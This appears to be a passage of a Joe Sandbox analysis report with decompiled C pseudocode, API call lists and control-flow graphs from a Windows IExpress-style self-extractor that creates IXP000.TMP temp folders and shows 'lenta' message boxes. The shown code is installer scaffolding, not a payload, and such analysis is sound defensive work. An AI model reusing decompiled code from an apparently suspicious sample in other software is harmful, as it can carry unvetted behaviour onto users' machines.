                                                                                                                                                                                                                                                0x000556e6
                                                                                                                                                                                                                                                0x000556eb
                                                                                                                                                                                                                                                0x000556ed
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000556f3
                                                                                                                                                                                                                                                0x000556f3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005586c
                                                                                                                                                                                                                                                0x00055878
                                                                                                                                                                                                                                                0x0005587e
                                                                                                                                                                                                                                                0x00055882
                                                                                                                                                                                                                                                0x00055883
                                                                                                                                                                                                                                                0x00055889
                                                                                                                                                                                                                                                0x0005588e
                                                                                                                                                                                                                                                0x0005588e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055896
                                                                                                                                                                                                                                                0x000556ed
                                                                                                                                                                                                                                                0x000556df
                                                                                                                                                                                                                                                0x000556d0
                                                                                                                                                                                                                                                0x000556c1
                                                                                                                                                                                                                                                0x000556a8
                                                                                                                                                                                                                                                0x0005565b
                                                                                                                                                                                                                                                0x0005565b
                                                                                                                                                                                                                                                0x0005565d
                                                                                                                                                                                                                                                0x00055669
                                                                                                                                                                                                                                                0x00055669
                                                                                                                                                                                                                                                0x0005565f
                                                                                                                                                                                                                                                0x0005565f
                                                                                                                                                                                                                                                0x00055665
                                                                                                                                                                                                                                                0x00055667
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055667
                                                                                                                                                                                                                                                0x0005566c
                                                                                                                                                                                                                                                0x00055673
                                                                                                                                                                                                                                                0x00055678
                                                                                                                                                                                                                                                0x0005567a
                                                                                                                                                                                                                                                0x0005589b
                                                                                                                                                                                                                                                0x0005589b
                                                                                                                                                                                                                                                0x00055680
                                                                                                                                                                                                                                                0x00055685
                                                                                                                                                                                                                                                0x0005568c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005568c
                                                                                                                                                                                                                                                0x0005567a
                                                                                                                                                                                                                                                0x0005560e
                                                                                                                                                                                                                                                0x00055613
                                                                                                                                                                                                                                                0x0005561a
                                                                                                                                                                                                                                                0x00055620
                                                                                                                                                                                                                                                0x00055626
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055626
                                                                                                                                                                                                                                                0x000555db
                                                                                                                                                                                                                                                0x000555e0
                                                                                                                                                                                                                                                0x000555e7
                                                                                                                                                                                                                                                0x000555f1
                                                                                                                                                                                                                                                0x000555f6
                                                                                                                                                                                                                                                0x000555f6
                                                                                                                                                                                                                                                0x000555f6
                                                                                                                                                                                                                                                0x000558b7
                                                                                                                                                                                                                                                0x000558c7

APIs
  • Part of subcall function 0005468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000546A0
  • Part of subcall function 0005468F: SizeofResource.KERNEL32(00000000,00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546A9
  • Part of subcall function 0005468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000546C3
  • Part of subcall function 0005468F: LoadResource.KERNEL32(00000000,00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546CC
  • Part of subcall function 0005468F: LockResource.KERNEL32(00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546D3
  • Part of subcall function 0005468F: memcpy_s.MSVCRT ref: 000546E5
  • Part of subcall function 0005468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000546EF
• LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 000555CF
• lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00055638
• LocalFree.KERNEL32(00000000), ref: 0005564C
• LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00055620
                                                                                                                                                                                                                                                  • Part of subcall function 000544B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00054518
                                                                                                                                                                                                                                                  • Part of subcall function 000544B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00054554
                                                                                                                                                                                                                                                  • Part of subcall function 00056285: GetLastError.KERNEL32(00055BBC), ref: 00056285
                                                                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 000556B9
                                                                                                                                                                                                                                                • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0005571E
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00055737
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 000557CD
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 000557EF
                                                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00055802
                                                                                                                                                                                                                                                  • Part of subcall function 00052630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00052654
                                                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00055830
                                                                                                                                                                                                                                                  • Part of subcall function 00056517: FindResourceA.KERNEL32(00050000,000007D6,00000005), ref: 0005652A
                                                                                                                                                                                                                                                  • Part of subcall function 00056517: LoadResource.KERNEL32(00050000,00000000,?,?,00052EE8,00000000,000519E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00056538
                                                                                                                                                                                                                                                  • Part of subcall function 00056517: DialogBoxIndirectParamA.USER32(00050000,00000000,00000547,000519E0,00000000), ref: 00056557
                                                                                                                                                                                                                                                  • Part of subcall function 00056517: FreeResource.KERNEL32(00000000,?,?,00052EE8,00000000,000519E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00056560
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00055878
                                                                                                                                                                                                                                                  • Part of subcall function 0005597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 000559A8
                                                                                                                                                                                                                                                  • Part of subcall function 0005597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 000559AF
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                                • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                                • API String ID: 2436801531-3855382519
                                                                                                                                                                                                                                                • Opcode ID: 25257565fa74d6dc6bbf4089f6f14d6e6ad6ae928b6bb080c25bb62e94ca0ce6
                                                                                                                                                                                                                                                • Instruction ID: 06c50c70b337472d09f6c0e9ea1713a2511bc2d5bfb6260c745c2a0b6be6d029
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 25257565fa74d6dc6bbf4089f6f14d6e6ad6ae928b6bb080c25bb62e94ca0ce6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB813970A04A089BEB609B709C65BFF76AD9F65303F040165FD86E3191EF748DCD8A51
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 406 544b9-544f8 407 544fe-54525 LoadStringA 406->407 408 54679-5467b 406->408 409 54527-5452e call 5681f 407->409 410 54562-54568 407->410 411 5467c-5468c call 56ce0 408->411 418 54530-5453d call 567c9 409->418 419 5453f 409->419 414 5456b-54570 410->414 414->414 417 54572-5457c 414->417 420 5457e-54580 417->420 421 545c9-545cb 417->421 418->419 425 54544-54554 MessageBoxA 418->425 419->425 426 54583-54588 420->426 423 54607-54617 LocalAlloc 421->423 424 545cd-545cf 421->424 429 5455a-5455d 423->429 430 5461d-54628 call 51680 423->430 428 545d2-545d7 424->428 425->429 426->426 431 5458a-5458c 426->431 428->428 433 545d9-545ed LocalAlloc 428->433 429->411 437 5462d-5463d MessageBeep call 5681f 430->437 432 5458f-54594 431->432 432->432 435 54596-545ad LocalAlloc 432->435 433->429 436 545f3-54605 call 5171e 433->436 435->429 439 545af-545c7 call 5171e 435->439 436->437 444 5463f-5464c call 567c9 437->444 445 5464e 437->445 439->437 444->445 448 54653-54677 MessageBoxA LocalFree 444->448 445->448 448->411
                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E000544B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v64;
                                                                                                                                                                                                                                                				char _v576;
                                                                                                                                                                                                                                                				void* _v580;
                                                                                                                                                                                                                                                				struct HWND__* _v584;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t34;
                                                                                                                                                                                                                                                				void* _t37;
                                                                                                                                                                                                                                                				signed int _t39;
                                                                                                                                                                                                                                                				intOrPtr _t43;
                                                                                                                                                                                                                                                				signed int _t44;
                                                                                                                                                                                                                                                				signed int _t49;
                                                                                                                                                                                                                                                				signed int _t52;
                                                                                                                                                                                                                                                				void* _t54;
                                                                                                                                                                                                                                                				intOrPtr _t55;
                                                                                                                                                                                                                                                				intOrPtr _t58;
                                                                                                                                                                                                                                                				intOrPtr _t59;
                                                                                                                                                                                                                                                				int _t64;
                                                                                                                                                                                                                                                				void* _t66;
                                                                                                                                                                                                                                                				intOrPtr* _t67;
                                                                                                                                                                                                                                                				signed int _t69;
                                                                                                                                                                                                                                                				intOrPtr* _t73;
                                                                                                                                                                                                                                                				intOrPtr* _t76;
                                                                                                                                                                                                                                                				intOrPtr* _t77;
                                                                                                                                                                                                                                                				void* _t80;
                                                                                                                                                                                                                                                				void* _t81;
                                                                                                                                                                                                                                                				void* _t82;
                                                                                                                                                                                                                                                				intOrPtr* _t84;
                                                                                                                                                                                                                                                				void* _t85;
                                                                                                                                                                                                                                                				signed int _t89;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t75 = __edx;
                                                                                                                                                                                                                                                				_t34 =  *0x58004; // 0x5a679bd9
                                                                                                                                                                                                                                                				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                                                                				_v584 = __ecx;
                                                                                                                                                                                                                                                				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                                                                				_t67 = _a4;
                                                                                                                                                                                                                                                				_t69 = 0xd;
                                                                                                                                                                                                                                                				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                                                                				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                                                                				_v580 = _t37;
                                                                                                                                                                                                                                                				asm("movsb");
                                                                                                                                                                                                                                                				if(( *0x58a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                                					_t39 = 1;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_v576 = 0;
                                                                                                                                                                                                                                                					LoadStringA( *0x59a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                                                                					if(_v576 != 0) {
                                                                                                                                                                                                                                                						_t73 =  &_v576;
                                                                                                                                                                                                                                                						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                                                                						_t75 = _t16;
                                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                                							_t43 =  *_t73;
                                                                                                                                                                                                                                                							_t73 = _t73 + 1;
                                                                                                                                                                                                                                                						} while (_t43 != 0);
                                                                                                                                                                                                                                                						_t84 = _v580;
                                                                                                                                                                                                                                                						_t74 = _t73 - _t75;
                                                                                                                                                                                                                                                						if(_t84 == 0) {
                                                                                                                                                                                                                                                							if(_t67 == 0) {
                                                                                                                                                                                                                                                								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                                                                								_t83 = _t27;
                                                                                                                                                                                                                                                								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                                                                								_t80 = _t44;
                                                                                                                                                                                                                                                								if(_t80 == 0) {
                                                                                                                                                                                                                                                									goto L6;
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									_t75 = _t83;
                                                                                                                                                                                                                                                									_t74 = _t80;
                                                                                                                                                                                                                                                									E00051680(_t80, _t83,  &_v576);
                                                                                                                                                                                                                                                									goto L23;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_t76 = _t67;
                                                                                                                                                                                                                                                								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                                                                								_t85 = _t24;
                                                                                                                                                                                                                                                								do {
                                                                                                                                                                                                                                                									_t55 =  *_t76;
                                                                                                                                                                                                                                                									_t76 = _t76 + 1;
                                                                                                                                                                                                                                                								} while (_t55 != 0);
                                                                                                                                                                                                                                                								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                                                                								_t83 = _t25 + _t74;
                                                                                                                                                                                                                                                								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                                                                								_t80 = _t44;
                                                                                                                                                                                                                                                								if(_t80 == 0) {
                                                                                                                                                                                                                                                									goto L6;
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									E0005171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                                									goto L23;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t77 = _t67;
                                                                                                                                                                                                                                                							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                                                                							_t81 = _t18;
                                                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                                                								_t58 =  *_t77;
                                                                                                                                                                                                                                                								_t77 = _t77 + 1;
                                                                                                                                                                                                                                                							} while (_t58 != 0);
                                                                                                                                                                                                                                                							_t75 = _t77 - _t81;
                                                                                                                                                                                                                                                							_t82 = _t84 + 1;
                                                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                                                								_t59 =  *_t84;
                                                                                                                                                                                                                                                								_t84 = _t84 + 1;
                                                                                                                                                                                                                                                							} while (_t59 != 0);
                                                                                                                                                                                                                                                							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                                                                							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                                                                							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                                                                							_t80 = _t44;
                                                                                                                                                                                                                                                							if(_t80 == 0) {
                                                                                                                                                                                                                                                								goto L6;
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_push(_v580);
                                                                                                                                                                                                                                                								E0005171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                                								L23:
                                                                                                                                                                                                                                                								MessageBeep(_a12);
                                                                                                                                                                                                                                                								if(E0005681F(_t67) == 0) {
                                                                                                                                                                                                                                                									L25:
                                                                                                                                                                                                                                                									_t49 = 0x10000;
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									_t54 = E000567C9(_t74, _t74);
                                                                                                                                                                                                                                                									_t49 = 0x190000;
                                                                                                                                                                                                                                                									if(_t54 == 0) {
                                                                                                                                                                                                                                                										goto L25;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16); // executed
                                                                                                                                                                                                                                                								_t83 = _t52;
                                                                                                                                                                                                                                                								LocalFree(_t80);
                                                                                                                                                                                                                                                								_t39 = _t52;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						if(E0005681F(_t67) == 0) {
                                                                                                                                                                                                                                                							L4:
                                                                                                                                                                                                                                                							_t64 = 0x10010;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t66 = E000567C9(0, 0);
                                                                                                                                                                                                                                                							_t64 = 0x190010;
                                                                                                                                                                                                                                                							if(_t66 == 0) {
                                                                                                                                                                                                                                                								goto L4;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
                                                                                                                                                                                                                                                						L6:
                                                                                                                                                                                                                                                						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00056CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                                                                			}



































                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00054628
                                                                                                                                                                                                                                                0x000545cd
                                                                                                                                                                                                                                                0x000545cd
                                                                                                                                                                                                                                                0x000545cf
                                                                                                                                                                                                                                                0x000545cf
                                                                                                                                                                                                                                                0x000545d2
                                                                                                                                                                                                                                                0x000545d2
                                                                                                                                                                                                                                                0x000545d4
                                                                                                                                                                                                                                                0x000545d5
                                                                                                                                                                                                                                                0x000545db
                                                                                                                                                                                                                                                0x000545de
                                                                                                                                                                                                                                                0x000545e3
                                                                                                                                                                                                                                                0x000545e9
                                                                                                                                                                                                                                                0x000545ed
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000545f3
                                                                                                                                                                                                                                                0x000545fd
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00054602
                                                                                                                                                                                                                                                0x000545ed
                                                                                                                                                                                                                                                0x0005457e
                                                                                                                                                                                                                                                0x0005457e
                                                                                                                                                                                                                                                0x00054580
                                                                                                                                                                                                                                                0x00054580
                                                                                                                                                                                                                                                0x00054583
                                                                                                                                                                                                                                                0x00054583
                                                                                                                                                                                                                                                0x00054585
                                                                                                                                                                                                                                                0x00054586
                                                                                                                                                                                                                                                0x0005458a
                                                                                                                                                                                                                                                0x0005458c
                                                                                                                                                                                                                                                0x0005458f
                                                                                                                                                                                                                                                0x0005458f
                                                                                                                                                                                                                                                0x00054591
                                                                                                                                                                                                                                                0x00054592
                                                                                                                                                                                                                                                0x0005459b
                                                                                                                                                                                                                                                0x0005459e
                                                                                                                                                                                                                                                0x000545a3
                                                                                                                                                                                                                                                0x000545a9
                                                                                                                                                                                                                                                0x000545ad
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000545af
                                                                                                                                                                                                                                                0x000545af
                                                                                                                                                                                                                                                0x000545bf
                                                                                                                                                                                                                                                0x0005462d
                                                                                                                                                                                                                                                0x00054630
                                                                                                                                                                                                                                                0x0005463d
                                                                                                                                                                                                                                                0x0005464e
                                                                                                                                                                                                                                                0x0005464e
                                                                                                                                                                                                                                                0x0005463f
                                                                                                                                                                                                                                                0x00054640
                                                                                                                                                                                                                                                0x00054647
                                                                                                                                                                                                                                                0x0005464c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005464c
                                                                                                                                                                                                                                                0x00054666
                                                                                                                                                                                                                                                0x0005466d
                                                                                                                                                                                                                                                0x0005466f
                                                                                                                                                                                                                                                0x00054675
                                                                                                                                                                                                                                                0x00054675
                                                                                                                                                                                                                                                0x000545ad
                                                                                                                                                                                                                                                0x00054527
                                                                                                                                                                                                                                                0x0005452e
                                                                                                                                                                                                                                                0x0005453f
                                                                                                                                                                                                                                                0x0005453f
                                                                                                                                                                                                                                                0x00054530
                                                                                                                                                                                                                                                0x00054531
                                                                                                                                                                                                                                                0x00054538
                                                                                                                                                                                                                                                0x0005453d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005453d
                                                                                                                                                                                                                                                0x00054554
                                                                                                                                                                                                                                                0x0005455a
                                                                                                                                                                                                                                                0x0005455a
                                                                                                                                                                                                                                                0x0005455a
                                                                                                                                                                                                                                                0x00054525
                                                                                                                                                                                                                                                0x0005468c

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00054518
                                                                                                                                                                                                                                                • MessageBoxA.USER32(?,?,lenta,00010010), ref: 00054554
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000065), ref: 000545A3
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000065), ref: 000545E3
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000002), ref: 0005460D
                                                                                                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 00054630
                                                                                                                                                                                                                                                • MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 00054666
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 0005466F
                                                                                                                                                                                                                                                  • Part of subcall function 0005681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0005686E
                                                                                                                                                                                                                                                  • Part of subcall function 0005681F: GetSystemMetrics.USER32(0000004A), ref: 000568A7
                                                                                                                                                                                                                                                  • Part of subcall function 0005681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 000568CC
                                                                                                                                                                                                                                                  • Part of subcall function 0005681F: RegQueryValueExA.ADVAPI32(?,00051140,00000000,?,?,0000000C), ref: 000568F4
                                                                                                                                                                                                                                                  • Part of subcall function 0005681F: RegCloseKey.ADVAPI32(?), ref: 00056902
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                                                                • String ID: LoadString() Error. Could not load string resource.$lenta
                                                                                                                                                                                                                                                • API String ID: 3244514340-1000497449
                                                                                                                                                                                                                                                • Opcode ID: f999e552ddf2171d3925a31fde3c8404f4ea8cf97177ae183017d9e24107d546
                                                                                                                                                                                                                                                • Instruction ID: e42001235c316e0b1b110c043a534ecb83ff7376802d51a4a49709def819c363
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f999e552ddf2171d3925a31fde3c8404f4ea8cf97177ae183017d9e24107d546
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC51E771900619ABDB219F28CC48BEB7BB9EF46306F144194FD09A7242DB35DD8DCB51
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                C-Code - Quality: 95%
                                                                                                                                                                                                                                                			E000553A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t5;
                                                                                                                                                                                                                                                				long _t13;
                                                                                                                                                                                                                                                				int _t14;
                                                                                                                                                                                                                                                				CHAR* _t20;
                                                                                                                                                                                                                                                				int _t29;
                                                                                                                                                                                                                                                				int _t30;
                                                                                                                                                                                                                                                				CHAR* _t32;
                                                                                                                                                                                                                                                				signed int _t33;
                                                                                                                                                                                                                                                				void* _t34;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t5 =  *0x58004; // 0x5a679bd9
                                                                                                                                                                                                                                                				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                                                                				_t32 = __edx;
                                                                                                                                                                                                                                                				_t20 = __ecx;
                                                                                                                                                                                                                                                				_t29 = 0;
                                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                                					E0005171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                                                                					_t34 = _t34 + 0x10;
                                                                                                                                                                                                                                                					_t29 = _t29 + 1;
                                                                                                                                                                                                                                                					E00051680(_t32, 0x104, _t20);
                                                                                                                                                                                                                                                					E0005658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                                                                					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                                                                					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                                                                					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if(_t29 < 0x190) {
                                                                                                                                                                                                                                                						continue;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					L3:
                                                                                                                                                                                                                                                					_t30 = 0;
                                                                                                                                                                                                                                                					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                                                                						_t30 = 1;
                                                                                                                                                                                                                                                						DeleteFileA(_t32);
                                                                                                                                                                                                                                                						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					L5:
                                                                                                                                                                                                                                                					return E00056CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                                                                				if(_t14 == 0) {
                                                                                                                                                                                                                                                					goto L3;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t30 = 1;
                                                                                                                                                                                                                                                				 *0x58a20 = 1;
                                                                                                                                                                                                                                                				goto L5;
                                                                                                                                                                                                                                                			}


















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0005171E: _vsnprintf.MSVCRT ref: 00051750
                                                                                                                                                                                                                                                • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 000553FB
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00055402
                                                                                                                                                                                                                                                • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0005541F
                                                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0005542B
                                                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00055434
                                                                                                                                                                                                                                                • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00055452
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
